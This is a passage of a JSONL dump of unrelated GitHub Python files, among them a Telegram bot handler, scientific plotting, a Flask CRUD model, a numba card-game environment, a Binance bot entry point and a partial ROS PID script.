chat_id=settings.TG_BOT_ESTHETIQUE_CHAT,\n is_esthetique_format=True,\n)\nasync def handle_esthetique_photo(message: types.Message):\n logging.info(message.photo)\n\n image_file = await get_photo_from_message(message)\n image = Image(message_id=message.message_id, file=image_file)\n image_serialier = ImageRedisSerializer(image=image, redis=redis)\n\n async with asyncio.Lock():\n duplicated_message_id = await image_serialier.get_duplicate()\n if not duplicated_message_id:\n logger.info(f'New esthetique came from {message.from_user}, remember photo hash...')\n return await image_serialier.save()\n\n logger.info(\n f'{message.from_user} sent duplicate with {message.message_id} '\n f'of {duplicated_message_id}. Warn him...'\n )\n await _duplicate_warn(\n message.chat.id,\n message.from_user.mention,\n message.message_id,\n duplicated_message_id,\n )\n","repo_name":"AlcibiadesCleinias/esthetique-telegram-bot","sub_path":"bot/src/bot/handlers/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"72531777152","text":"import sys\nimport re\nimport os\nimport numpy as np\nfrom core import block, transforms, parse\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom tensorflow import keras\nfrom tensorflow.python.keras.models import load_model\n\nfrom scipy.signal import savgol_filter, butter\n\nfrom scipy.optimize import curve_fit\n\n\nmatplotlib.rcParams.update({'font.size': 12})\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\ndef backstrapolate(r, phi):\n assert len(r.shape) == len(phi.shape), \"dimensions are not correct\"\n\n cav = r.shape[0] - phi.shape[0]\n\n phi_ex = np.zeros_like(r)\n\n def polynom(r, a, b, c):\n return a * np.exp(b*r) + c\n\n popt, pcov = curve_fit(polynom, r[cav:cav+20], phi[:20])\n\n phi_ex[cav:] = phi\n phi_ex[:cav] = polynom(r[:cav], *popt)\n\n return r, phi_ex\n\n\ndef plot_funcs(r, avg_tcf, err_tcf, avg_dcf, err_dcf, avg_grad_icf, err_grad_icf, fd_gr,):\n \"\"\"\n plot some stuff\n \"\"\"\n mask_var = fd_gr.shape[0]- np.sum(np.isfinite(fd_gr))\n mask_avg = np.argmax(avg_tcf + 1.> 1e-8)\n\n print(mask_avg, mask_var, r[mask_var])\n mask = np.max((mask_avg, mask_var))\n\n X_down = np.vstack((avg_tcf[mask:], avg_dcf[mask:], fd_gr[mask:], avg_grad_icf[mask:])).T\n\n # Get IBI potential\n phi_ibi = -np.log(avg_tcf[mask:] + 1.)\n\n # Get HNC potential\n phi_hnc = avg_tcf[mask:] - avg_dcf[mask:] + phi_ibi\n\n ## Get Non-Local Closure Potential\n non_local = load_model('learn/models/non-local-400.h5', compile=False)\n br_nla = non_local.predict(X_down[:,0:4]).ravel()\n phi_nla = phi_hnc + br_nla\n\n br_nla_s = savgol_filter(br_nla, window_length=21, polyorder=2, deriv=0, delta=r[1]-r[0])\n phi_nla_s = phi_hnc + br_nla_s\n\n r, phi_ibi = backstrapolate(r, phi_ibi)\n r, phi_hnc = backstrapolate(r, phi_hnc)\n r, phi_nla_s = backstrapolate(r, phi_nla_s)\n r, phi_nla = backstrapolate(r, phi_nla)\n\n f_ibi = -np.gradient(phi_ibi, r[1]-r[0])\n f_hnc = -np.gradient(phi_hnc, r[1]-r[0])\n f_nla = -np.gradient(phi_nla, r[1]-r[0])\n # f_nla_s = -np.gradient(phi_nla_s, r[1]-r[0])\n\n # f_ibi = -savgol_filter(phi_ibi, window_length=31, polyorder=2, deriv=1, delta=r[1]-r[0])\n # f_hnc = -savgol_filter(phi_hnc, window_length=31, polyorder=2, deriv=1, delta=r[1]-r[0])\n f_nla_s = -savgol_filter(phi_nla_s, window_length=7, polyorder=2, deriv=1, delta=r[1]-r[0])\n\n #Save the potentials\n output_path = \"data/test/down/\"\n r_cut_ind = np.argmin(r<3)\n\n # 
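The actual duplicate lookup lives in `ImageRedisSerializer`, which is not shown in this record. A minimal sketch of the underlying idea, keying an index by the SHA-256 of the raw image bytes; the class and method names here are invented for illustration, and exact-byte matching is a simplification (it will not catch re-encoded images the way perceptual hashing would):

```python
import hashlib

class DedupIndex:
    """In-memory stand-in for a Redis-backed index: digest -> message_id."""
    def __init__(self):
        self._seen = {}

    def check_and_store(self, image_bytes: bytes, message_id: int):
        digest = hashlib.sha256(image_bytes).hexdigest()
        if digest in self._seen:
            return self._seen[digest]    # id of the original message
        self._seen[digest] = message_id  # first sighting: remember it
        return None

index = DedupIndex()
assert index.check_and_store(b"\x89PNG...", 10) is None
assert index.check_and_store(b"\x89PNG...", 11) == 10  # byte-identical duplicate
```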
save phi\n mix_type = \"lj-mix\"\n file_ibi = os.path.join(output_path,'phi_ibi_{}.dat'.format(mix_type))\n file_hnc = os.path.join(output_path,'phi_hnc_{}.dat'.format(mix_type))\n file_nla = os.path.join(output_path,'phi_nla_{}.dat'.format(mix_type))\n file_nla_n = os.path.join(output_path,'phi_nla_n_{}.dat'.format(mix_type))\n\n out_ibi = np.vstack((r[:r_cut_ind], phi_ibi[:r_cut_ind], f_ibi[:r_cut_ind]))\n np.savetxt(file_ibi, out_ibi)\n\n out_hnc = np.vstack((r[:r_cut_ind], phi_hnc[:r_cut_ind], f_hnc[:r_cut_ind]))\n np.savetxt(file_hnc, out_hnc)\n\n out_nla = np.vstack((r[:r_cut_ind], phi_nla_s[:r_cut_ind], f_nla_s[:r_cut_ind]))\n np.savetxt(file_nla, out_nla)\n\n out_nla_n = np.vstack((r[:r_cut_ind], phi_nla[:r_cut_ind], f_nla[:r_cut_ind]))\n np.savetxt(file_nla_n, out_nla_n)\n\n # plot\n\n fig, axes = plt.subplots(2, 3, figsize=(18, 8))\n\n # Plot g(r)\n\n axes[0, 0].plot(r, avg_tcf + 1)\n axes[0, 0].fill_between(r, avg_tcf + err_tcf + 1, avg_tcf - err_tcf + 1, alpha=0.3)\n\n axes[0, 0].plot((r[0],r[-1]), np.ones(2), '--', color=\"tab:blue\")\n axes[0, 0].set_xlabel('r/$\\sigma$')\n axes[0, 0].set_ylabel('$g(r)$')\n\n # Plot c(r)\n\n axes[0, 1].plot(r, avg_dcf, label='$c_{sw}(r)$')\n axes[0, 1].fill_between(r, avg_dcf + err_dcf, avg_dcf - err_dcf, alpha=0.2)\n\n axes[0, 1].plot((r[0],r[-1]), np.zeros(2), '--', color=\"tab:blue\")\n axes[0, 1].set_xlabel('r/$\\sigma$')\n axes[0, 1].set_ylabel('$c(r)$')\n axes[0, 1].legend()\n\n # plot y'(r)\n\n axes[1, 1].plot(r, avg_grad_icf)\n axes[1, 1].fill_between(r, avg_grad_icf + err_grad_icf, avg_grad_icf - err_grad_icf, alpha=0.2)\n axes[1, 1].set_xlabel('r/$\\sigma$')\n axes[1, 1].set_ylabel('$\\gamma\\'(r)$')\n\n # plot b(r)\n\n axes[0, 2].plot(r, np.zeros_like(r), label=\"HNC\")\n axes[0, 2].plot(r[mask:], br_nla, label=\"NLA\")\n axes[0, 2].plot(r[mask:], br_nla_s, label=\"NLA-SG\")\n axes[0, 2].set_xlabel('r/$\\sigma$')\n axes[0, 2].set_ylabel('$b(r)$')\n axes[0, 2].legend()\n\n # Phi(r)\n\n axes[1, 2].plot(r,phi_ibi, label=\"IBI\")\n axes[1, 2].plot(r,phi_hnc, label=\"HNC\")\n axes[1, 2].plot(r,phi_nla, label=\"NLA\", alpha=0.3)\n axes[1, 2].plot(r,phi_nla_s, label=\"NLA-SG\")\n axes[1, 2].set_xlim((0,3))\n axes[1, 2].set_ylim((-2,6))\n axes[1, 2].set_xlabel('r/$\\sigma$')\n axes[1, 2].set_ylabel('$\\phi(r)$')\n axes[1, 2].legend()\n\n ## f(r)\n\n axes[1, 0].plot(r,f_ibi, label=\"IBI\")\n axes[1, 0].plot(r,f_hnc, label=\"HNC\")\n axes[1, 0].plot(r,f_nla, label=\"NLA\", alpha=0.3)\n axes[1, 0].plot(r,f_nla_s, label=\"NLA-SG\")\n # axes[1, 0].plot(r,f_nla_sg, '--', label=\"NLA-SG\")\n axes[1, 0].set_xlim((0,3))\n axes[1, 0].set_ylim((-20,50))\n axes[1, 0].set_xlabel('r/$\\sigma$')\n axes[1, 0].set_ylabel('$f(r)$')\n axes[1, 0].legend()\n\n fig.tight_layout()\n\n plt.show()\n\n\n return\n \n\n\n\nif __name__ == \"__main__\":\n\n input_size = 20.\n input_density = 0.8\n input_temp = 1.0\n\n rdf_path = sys.argv[1]\n sq_path = sys.argv[2]\n \n real = transforms.process_inputs(input_size, input_temp, input_density, \n \"invert\", rdf_path=rdf_path, sq_path=sq_path)\n\n plot_funcs(*real)\n\n plt.show()\n\n","repo_name":"CompRhys/ornstein-zernike","sub_path":"process/multi-potential.py","file_name":"multi-potential.py","file_ext":"py","file_size_in_byte":5630,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"7744993056","text":"import sys\nfrom pytex.src import PytexTools\n\nmyRequest = PytexTools.Request(\"seconde\")\nmyRequest.original_filename=\"smath.tex\"\n\ndef 
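`backstrapolate` above fills the cavity region by fitting `a * exp(b*r) + c` to the first few known samples and evaluating the fit below the sampled range. A self-contained sketch of the same pattern on synthetic data; the ground-truth coefficients and the starting guess `p0` are illustrative:

```python
import numpy as np
from scipy.optimize import curve_fit

def model(r, a, b, c):
    return a * np.exp(b * r) + c

rng = np.random.default_rng(0)
r = np.linspace(0.5, 3.0, 60)
phi = model(r, 2.0, -1.5, 0.3) + rng.normal(0, 0.01, r.size)  # noisy samples

# Fit on the first 20 points, then evaluate the model below the sampled range.
popt, _ = curve_fit(model, r[:20], phi[:20], p0=(1.0, -1.0, 0.0))
r_inner = np.linspace(0.0, 0.5, 10)
phi_inner = model(r_inner, *popt)  # extrapolated values for the unsampled core
print(np.round(popt, 2))           # close to [2.0, -1.5, 0.3]
```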
set_corrPosition_and_Draft(A):\n u=\"\\corrPosition{1}\"\n v=\"\\corrPosition{2}\"\n A = A.replace(u, v)\n u=\"\\corrPosition{2}\"\n A = A.replace(u, v)\n u=\"\\corrDraft\"\n A=A.replace(u,\"%\")\n return A\n\ndef accept_all_input(medicament):\n medicament.accept_input=lambda x: True\n\nmyRequest.add_plugin(accept_all_input,\"options\")\nmyRequest.add_plugin(set_corrPosition_and_Draft,\"after_pytex\")\nmyRequest.new_output_filename=\"0-smath.pdf\"\n","repo_name":"LaurentClaessens/smath","sub_path":"lst_smath.py","file_name":"lst_smath.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"2520830137","text":"# Problem Id: 122\n# Problem Name: Best Time to Buy and Sell Stock II, 买卖股票的最佳时机 II\n# Problem Url: https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-ii/\n# Problem Level: Medium\n# Language: Python3\n \nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n result = 0\n for i in range(1,len(prices)):\n if prices[i] - prices[i-1] > 0:\n result = result + prices[i] - prices[i-1]\n return result\n","repo_name":"siru-xiong/leetcode-solutions","sub_path":"solutions/0122-买卖股票的最佳时机II.py","file_name":"0122-买卖股票的最佳时机II.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8175971411","text":"# import the function that will return an instance of a connection\nfrom flask_app.config.mysqlconnection import connectToMySQL\n# model the class after the friend table from our database\n\nDATABASE = 'Users_schema'\n\nclass User:\n def __init__( self , data ):\n self.id = data['id']\n self.first_name = data['first_name']\n self.last_name = data['last_name']\n self.email = data['email']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n # Now we use class methods to query our database\n \n #**********************************READ\n \n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM users;\"\n results = connectToMySQL(DATABASE).query_db(query)\n users = []\n for user in results:\n users.append(cls(user))\n return users\n\n @classmethod\n def get_one(cls, id):\n query = \"SELECT * FROM users WHERE id = %(id)s;\"\n results = connectToMySQL(DATABASE).query_db(query, id)\n if results:\n user = cls(results[0])\n return user\n\n\n#****************************************CREATE\n @classmethod\n def save(cls, data ):\n query = \"INSERT INTO users ( first_name , last_name , email) VALUES ( %(first_name)s , %(last_name)s , %(email)s);\"\n # data is a dictionary that will be passed into the save method from server.py\n return connectToMySQL(DATABASE).query_db( query, data)\n\n#********************************************UPDATE\n\n @classmethod\n def update_one(cls, data:dict) -> None:\n query = \"UPDATE users SET first_name = %(first_name)s, last_name = %(last_name)s, email = %(email)s WHERE id = %(id)s;\"\n return connectToMySQL(DATABASE).query_db(query, data)\n\n#********************************************DELETE\n\n @classmethod\n def delete_one(cls, data: dict) -> None:\n query = 'DELETE from users WHERE id = %(id)s;' \n return connectToMySQL(DATABASE).query_db(query, data)","repo_name":"s3mi0tics/users_crud_modularized","sub_path":"flask_app/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} 
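The CRUD model a few records above always passes values through a data dict, letting the MySQL connector bind them as `%(name)s` placeholders instead of splicing them into the SQL string. A usage sketch of driving that model from a controller; the route and form field names are assumptions, only `User` comes from the record itself:

```python
# A minimal sketch, assuming the usual Flask wiring for this project layout.
from flask import Flask, request, redirect
from flask_app.models.user import User

app = Flask(__name__)

@app.route("/users/create", methods=["POST"])
def create_user():
    data = {
        "first_name": request.form["first_name"],
        "last_name": request.form["last_name"],
        "email": request.form["email"],
    }
    # Values travel as a dict and are bound server-side as %(first_name)s
    # placeholders, so user input is never interpolated into the query text.
    User.save(data)
    return redirect("/users")
```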
+{"seq_id":"10836854934","text":"from typing import Union\n\nfrom pyodoo import CompareType\n\n\nclass Filter(object):\n \"\"\"\n A filter object used by Odoo\n \"\"\"\n def __init__(self,\n field: str,\n compare_type: CompareType,\n value: object):\n self.field = field\n self.compare_type = compare_type\n self.value = value\n\n def explode(self) -> list[Union[str, object]]:\n \"\"\"\n Extract the list from the filter, in the format used in Odoo filters\n\n :return: list with three values (field name, compare type and value)\n \"\"\"\n return [self.field,\n self.compare_type,\n self.value]\n","repo_name":"muflone/pyodoo","sub_path":"pyodoo/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"24659347216","text":"import numpy as np\nfrom numba import njit, jit\nfrom numba.typed import List\n\nperData = np.array([0])\nCARD = 52\ncards = np.arange(1, 53) # Build cards\nsevens = np.array([6, 19, 32, 45])\nidxChip = np.array([21, 35, 49, 63])\nACTION_SIZE = 53\nAGENT_SIZE = 4\nSTATE_SIZE = 112\n\n\n# Work function\n@njit()\ndef initEnv():\n cards = np.arange(0, 52, dtype=np.int64)\n np.random.shuffle(cards)\n env = np.full(71, 0)\n env[0:8] = np.array([-1, 6, -1, 19, -1, 32, -1, 45])\n\n env[8:21] = cards[0:13]\n env[22:35] = cards[13:26]\n env[36:49] = cards[26:39]\n env[50:63] = cards[39:52]\n idx = np.array([21, 35, 49, 63])\n env[idx] = 50\n env[64] = 0\n env[65] = 0\n env[66] = 0\n return env\n\n\n@njit()\ndef getAgentSize():\n return AGENT_SIZE\n\n\n@njit()\ndef getActionSize():\n return ACTION_SIZE\n\n\n@njit()\ndef getStateSize():\n return STATE_SIZE\n\n\n@njit()\ndef getAgentState(env):\n state = np.zeros(112)\n pIdx = env[64]\n player_card_idx = env[8 + pIdx * 14 : 8 + pIdx * 14 + 13]\n state[player_card_idx] = 1\n card_on_board = env[0:8]\n card_on_board = card_on_board[card_on_board > -1]\n card_on_board_id = np.full(52, 0)\n card_on_board_id[card_on_board] = 1\n state[52:104] = card_on_board_id\n state[104] = env[8 + pIdx * 14 + 13]\n cards_len = list([0, 0, 0])\n count = 0\n for i in range(getAgentSize()):\n if i == pIdx:\n continue\n cards = env[8 + i * 14 : 8 + i * 14 + 13]\n len_ = len(np.where(cards > -1)[0])\n cards_len[count] = len_\n count += 1\n state[105:108] = cards_len\n state[108] = env[66] # Game da ket thuc hay chua\n chipArr = np.zeros(3)\n count = 0\n for i in range(4):\n if i == pIdx:\n continue\n chip = env[8 + i * 14 + 13]\n chipArr[count] = chip\n count += 1\n state[109:112] = chipArr\n return state\n\n\n@njit()\ndef getValidActions(state):\n p_cards_binary = state[0:52]\n p_cards = np.where(p_cards_binary == 1)[0]\n card_on_board_binary = state[52:104]\n card_on_board = np.where(card_on_board_binary == 1)[0]\n arr_action = np.zeros(53)\n arr_action[52] = 1\n for i in range(len(arr_action)):\n if i in p_cards and i in card_on_board:\n arr_action[i] = 1\n return arr_action\n\n\n# ------------------------------------------------------------------------\n@njit()\ndef stepEnv(action, env):\n player_Id = env[64]\n player_Card = env[8 + player_Id * 14 : 8 + player_Id * 14 + 13]\n current_card_on_board = env[0:8]\n if action == 52:\n env[8 + player_Id * 14 + 13] -= 1\n env[65] += 1\n if env[8 + player_Id * 14 + 13] <= 0:\n return -2\n if action != 52:\n player_Card[np.where(player_Card == action)[0]] = -1\n if action == 6 or action == 19 or action == 32 or action == 45: # action bang 7\n if action == 6:\n current_card_on_board[0:2] = [5, 
7]\n if action == 19:\n current_card_on_board[2:4] = [18, 20]\n if action == 32:\n current_card_on_board[4:6] = [31, 33]\n if action == 45:\n current_card_on_board[6:8] = [44, 46]\n else: # handle the remaining valid actions\n if 0 <= action < 6:\n current_card_on_board[0] -= 1\n if 6 < action < 12:\n current_card_on_board[1] += 1\n if 12 < action < 19:\n current_card_on_board[2] -= 1\n if 19 < action < 25:\n current_card_on_board[3] += 1\n if 25 < action < 32:\n current_card_on_board[4] -= 1\n if 32 < action < 38:\n current_card_on_board[5] += 1\n if 38 < action < 45:\n current_card_on_board[6] -= 1\n if 45 < action < 52:\n current_card_on_board[7] += 1\n env[0:8] = current_card_on_board\n env[8 + player_Id * 14 : 8 + player_Id * 14 + 13] = player_Card\n if max(env[8 + player_Id * 14 : 8 + player_Id * 14 + 13]) == -1:\n return -1\n return 0\n\n\n# ----------------------------------------------------------------\n@njit()\ndef getReward(state):\n IsEnd = state[108]\n if IsEnd == 0:\n return -1\n if IsEnd == 1:\n p_chip = state[104]\n chip_arr = state[109:112]\n if p_chip > max(chip_arr):\n return 1\n elif p_chip == max(chip_arr):\n id_max_chip = np.argmax(chip_arr)\n cards_len = state[105:108]\n player_cards = state[0:52]\n player_cards_id = np.where(player_cards == 1)[0]\n player_cards_len = len(player_cards_id)\n if player_cards_len >= cards_len[id_max_chip]:\n return 1\n else:\n return 0\n else:\n return 0\n\n\n# ----------------------------------------------------------------\n@njit()\ndef one_game_numba(\n p0,\n list_other,\n per_player,\n per1,\n per2,\n per3,\n p1,\n p2,\n p3,\n):\n allGame = True\n saveStoreChip = np.array([50, 50, 50, 50])\n idxPlayerChip = np.array([21, 35, 49, 63])\n while allGame:\n env = initEnv()\n env[idxPlayerChip] = saveStoreChip\n oneGame = True\n while oneGame:\n count = 10000\n if count > 0:\n count -= 1\n for i in range(getAgentSize()):\n env[64] = i\n state = getAgentState(env)\n if list_other[i] == -1:\n action, per_player = p0(state, per_player)\n if list_other[i] == 1:\n action, per1 = p1(state, per1)\n if list_other[i] == 2:\n action, per2 = p2(state, per2)\n if list_other[i] == 3:\n action, per3 = p3(state, per3)\n stepEnvReturn = stepEnv(action, env)\n if stepEnvReturn == -1:\n oneGame = False\n env[8 + i * 14 + 13] += env[65]\n saveStoreChip = env[idxPlayerChip]\n env[65] = 0\n elif stepEnvReturn == -2: # when a player runs out of chips\n env[66] = 1\n # award the pot to the player with the fewest cards left\n player_chip = env[idxPlayerChip]\n player_id_not_0_chip = np.where(player_chip > 0)[0]\n arr_player_cards = np.zeros(13 * 3)\n for i in range(len(player_id_not_0_chip)):\n player_cards = env[\n 8\n + player_id_not_0_chip[i] * 14 : 8\n + player_id_not_0_chip[i] * 14\n + 13\n ] # cards of the players who still have chips\n arr_player_cards[\n i * 13 : i * 13 + 13\n ] = player_cards.astype(np.float64)\n arr_player_cards = np.reshape(arr_player_cards, (3, 13))\n player_card_len = np.array(\n [\n len(np.where(player_cards > -1)[0])\n for player_cards in arr_player_cards\n ]\n )\n player_lowest_card = np.argmin(player_card_len)\n player_lowest_card_id = player_id_not_0_chip[player_lowest_card]\n env[idxPlayerChip[player_lowest_card_id]] += env[65]\n env[65] = 0\n\n for pIdx in range(4):\n env[64] = pIdx\n state = getAgentState(env)\n if list_other[pIdx] == -1:\n action, per_player = p0(getAgentState(env), per_player)\n if getReward(state) == 1:\n winner = True\n else:\n winner = False\n elif list_other[pIdx] == 1:\n action, per1 = p1(getAgentState(env), per1)\n elif list_other[pIdx] == 
2:\n action, per2 = p2(getAgentState(env), per2)\n elif list_other[pIdx] == 3:\n action, per3 = p3(getAgentState(env), per3)\n allGame = False\n return winner, per_player\n if count < 0:\n return False, per_player\n\n\n# # ------------------------------------------------------------------------\ndef one_game_normal(p0, list_other, per_player, per1, per2, per3, p1, p2, p3):\n allGame = True\n saveStoreChip = np.array([50, 50, 50, 50])\n idxPlayerChip = np.array([21, 35, 49, 63])\n while allGame:\n env = initEnv()\n env[idxPlayerChip] = saveStoreChip\n oneGame = True\n while oneGame:\n count = 10000\n if count > 0:\n count -= 1\n for i in range(getAgentSize()):\n env[64] = i\n state = getAgentState(env)\n if list_other[i] == -1:\n action, per_player = p0(state, per_player)\n if list_other[i] == 1:\n action, per1 = p1(state, per1)\n if list_other[i] == 2:\n action, per2 = p2(state, per2)\n if list_other[i] == 3:\n action, per3 = p3(state, per3)\n stepEnvReturn = stepEnv(action, env)\n if stepEnvReturn == -1:\n oneGame = False\n env[8 + i * 14 + 13] += env[65]\n saveStoreChip = env[idxPlayerChip]\n env[65] = 0\n elif stepEnvReturn == -2:\n env[66] = 1\n # award the pot to the player with the fewest cards left\n\n player_chip = env[idxPlayerChip]\n player_id_not_0_chip = np.where(player_chip > 0)[0]\n arr_player_cards = np.zeros(13 * 3)\n for i in range(len(player_id_not_0_chip)):\n player_cards = env[\n 8\n + player_id_not_0_chip[i] * 14 : 8\n + player_id_not_0_chip[i] * 14\n + 13\n ] # cards of the players who still have chips\n arr_player_cards[\n i * 13 : i * 13 + 13\n ] = player_cards.astype(np.float64)\n arr_player_cards = np.reshape(arr_player_cards, (3, 13))\n player_card_len = np.array(\n [\n len(np.where(player_cards > -1)[0])\n for player_cards in arr_player_cards\n ]\n )\n player_lowest_card = np.argmin(player_card_len)\n player_lowest_card_id = player_id_not_0_chip[player_lowest_card]\n env[idxPlayerChip[player_lowest_card_id]] += env[65]\n env[65] = 0\n for pIdx in range(4):\n env[64] = pIdx\n state = getAgentState(env)\n if list_other[pIdx] == -1:\n action, per_player = p0(getAgentState(env), per_player)\n if getReward(state) == 1:\n winner = True\n else:\n winner = False\n elif list_other[pIdx] == 1:\n action, per1 = p1(getAgentState(env), per1)\n elif list_other[pIdx] == 2:\n action, per2 = p2(getAgentState(env), per2)\n elif list_other[pIdx] == 3:\n action, per3 = p3(getAgentState(env), per3)\n allGame = False\n return winner, per_player\n if count < 0:\n return False, per_player\n\n\ndef n_games_normal(p0, num_game, per_player, list_other, per1, per2, per3, p1, p2, p3):\n win = 0\n for _ in range(num_game):\n np.random.shuffle(list_other)\n winner, per_player = one_game_normal(\n p0, list_other, per_player, per1, per2, per3, p1, p2, p3\n )\n win += winner\n return win, per_player\n\n\n@njit()\ndef n_games_numba(p0, num_game, per_player, list_other, per1, per2, per3, p1, p2, p3):\n win = 0\n for _ in range(num_game):\n np.random.shuffle(list_other)\n winner, per_player = one_game_numba(\n p0, list_other, per_player, per1, per2, per3, p1, p2, p3\n )\n win += winner\n return win, per_player\n\n\n# -----------------------------------------------------------------------------------\nimport importlib.util, json, sys\n\ntry:\n from env import SHORT_PATH\nexcept:\n pass\n\n\n@njit()\ndef bot_lv0(state, perData):\n validActions = getValidActions(state)\n arr_action = np.where(validActions == 1)[0]\n idx = np.random.randint(0, arr_action.shape[0])\n return arr_action[idx], perData\n\n\ndef 
load_module_player(player, game_name=None):\n if game_name == None:\n spec = importlib.util.spec_from_file_location(\n \"Agent_player\", f\"{SHORT_PATH}src/Agent/{player}/Agent_player.py\"\n )\n else:\n spec = importlib.util.spec_from_file_location(\n \"Agent_player\", f\"{SHORT_PATH}src/Agent/ifelse/{game_name}/{player}.py\"\n )\n module = importlib.util.module_from_spec(spec)\n sys.modules[spec.name] = module\n spec.loader.exec_module(module)\n return module\n\n\n@njit()\ndef check_run_under_njit(agent, perData):\n return True\n\n\ndef load_agent(level, *args):\n num_bot = getAgentSize() - 1\n\n if \"_level_\" not in globals():\n global _level_\n _level_ = level\n init = True\n else:\n if _level_ != level:\n _level_ = level\n init = True\n else:\n init = False\n\n if init:\n global _list_per_level_\n global _list_bot_level_\n _list_per_level_ = []\n _list_bot_level_ = []\n\n if _level_ == 0:\n _list_per_level_ = [\n np.array([[0.0]], dtype=np.float64) for _ in range(num_bot)\n ]\n _list_bot_level_ = [bot_lv0 for _ in range(num_bot)]\n else:\n env_name = sys.argv[1]\n if len(args) > 0:\n dict_level = json.load(\n open(f\"{SHORT_PATH}src/Log/check_system_about_level.json\")\n )\n else:\n dict_level = json.load(open(f\"{SHORT_PATH}src/Log/level_game.json\"))\n\n if str(_level_) not in dict_level[env_name]:\n raise Exception(\"This level does not exist yet\")\n\n lst_agent_level = dict_level[env_name][str(level)][2]\n lst_module_level = [\n load_module_player(lst_agent_level[i]) for i in range(num_bot)\n ]\n for i in range(num_bot):\n data_agent_level = np.load(\n f\"{SHORT_PATH}src/Agent/{lst_agent_level[i]}/Data/{env_name}_{level}/Train.npy\",\n allow_pickle=True,\n )\n _list_per_level_.append(\n lst_module_level[i].convert_to_test(data_agent_level)\n )\n _list_bot_level_.append(lst_module_level[i].Test)\n\n return _list_bot_level_, _list_per_level_\n\n\ndef run(\n p0: any = bot_lv0,\n num_game: int = 100,\n per_player: np.ndarray = np.array([[0.0]]),\n level: int = 0,\n *args,\n):\n num_bot = getAgentSize() - 1\n list_other = np.array([-1] + [i + 1 for i in range(num_bot)])\n try:\n check_njit = check_run_under_njit(p0, per_player)\n except:\n check_njit = False\n\n load_agent(level, *args)\n\n if check_njit:\n return n_games_numba(\n p0,\n num_game,\n per_player,\n list_other,\n _list_per_level_[0],\n _list_per_level_[1],\n _list_per_level_[2],\n _list_bot_level_[0],\n _list_bot_level_[1],\n _list_bot_level_[2],\n )\n else:\n return n_games_normal(\n p0,\n num_game,\n per_player,\n list_other,\n _list_per_level_[0],\n _list_per_level_[1],\n _list_per_level_[2],\n _list_bot_level_[0],\n _list_bot_level_[1],\n _list_bot_level_[2],\n )\n","repo_name":"ngoxuanphong/ENV","sub_path":"src/Base/Fantan/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":17066,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"60"}
+{"seq_id":"13025627239","text":"import tkinter as tk\nimport logging\nfrom connectors.bitmex_futures import get_contracts\nfrom connectors.binance_futures import BinanceFuturesClient\nimport config\nimport pprint\n\n\nlogger = logging.getLogger()\n\n# logger.debug(\"This message is important only when debugging the program\")\n# logger.info(\"This message just shows basic information\")\n# logger.warning(\"This message is about something you should pay attention to\")\n# logger.error(\"this message helps to debug an error that occurred in your program\")\n\nlogger.setLevel(logging.INFO)\n\nstream_handler = 
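Agents in this environment are plain `(state, per) -> (action, per)` callables, as `bot_lv0` shows. A sketch of a slightly less random agent in the same interface, assuming it runs alongside the environment module; the heuristic is illustrative and not part of the original repo:

```python
import numpy as np

def greedy_bot(state, per):
    """Play the lowest playable card; pay a chip (action 52) only when forced."""
    valid = getValidActions(state)            # 53-element 0/1 mask from the env
    playable = np.where(valid[:52] == 1)[0]   # card actions only
    if playable.shape[0] > 0:
        return playable[0], per               # lowest card index first
    return 52, per                            # no playable card: pass and pay

# win, per = run(greedy_bot, num_game=100, per_player=np.array([[0.0]]), level=0)
# greedy_bot is not @njit-compiled, so run() falls back to the normal path.
```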
logging.StreamHandler()\nformatter = logging.Formatter(\"%(asctime)s %(levelname)s :: %(message)s\")\nstream_handler.setFormatter(formatter)\nstream_handler.setLevel(logging.INFO)\n\nfile_handler = logging.FileHandler('info.log')\nfile_handler.setFormatter(formatter)\nfile_handler.setLevel(logging.DEBUG)\n\nlogger.addHandler(stream_handler)\nlogger.addHandler(file_handler)\n\nif __name__ == '__main__':\n\n binanceObject = BinanceFuturesClient(config.BINANCE_KEY, config.BINANCE_SECRET, False)\n # binanceObject = BinanceFuturesClient(config.TESTNET_BINANCE_KEY, config.TESTNET_BINANCE_SECRET, True)\n # pprint.pprint(binanceObject.get_balance())\n\n root = tk.Tk()\n root.mainloop()\n\n","repo_name":"efunnuga-bamidele/Trading-Bot-v1.0","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"38345171443","text":"#!/usr/bin/env python\n\nimport sys\nimport copy\nimport rospy\nimport moveit_commander\nimport moveit_msgs.msg\nimport geometry_msgs.msg\nfrom math import pi\nfrom std_msgs.msg import String\nfrom moveit_commander.conversions import pose_to_list\nfrom datetime import datetime\n\nfrom matplotlib.animation import FuncAnimation\nfrom random import randrange\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\n\n\nfrom std_msgs.msg import Float64\n\nError = 0;\nprevious_error = 0; #previous error\nchange_y = 0;\nintegral = 0;\nderivative = 0;\n\ndesiredAngle = 0.00;\n\nx_data, y_data = [], []\n\n#figure = plt.figure()\n#line, = plt.plot_date(x_data, y_data, '-')\n\n\nKp = 0.02; \nKi = 0.001; \nKd = 0.0015; \nprogram_start=time.time()\n\ndef callback(data):\n\tglobal integral,Error, 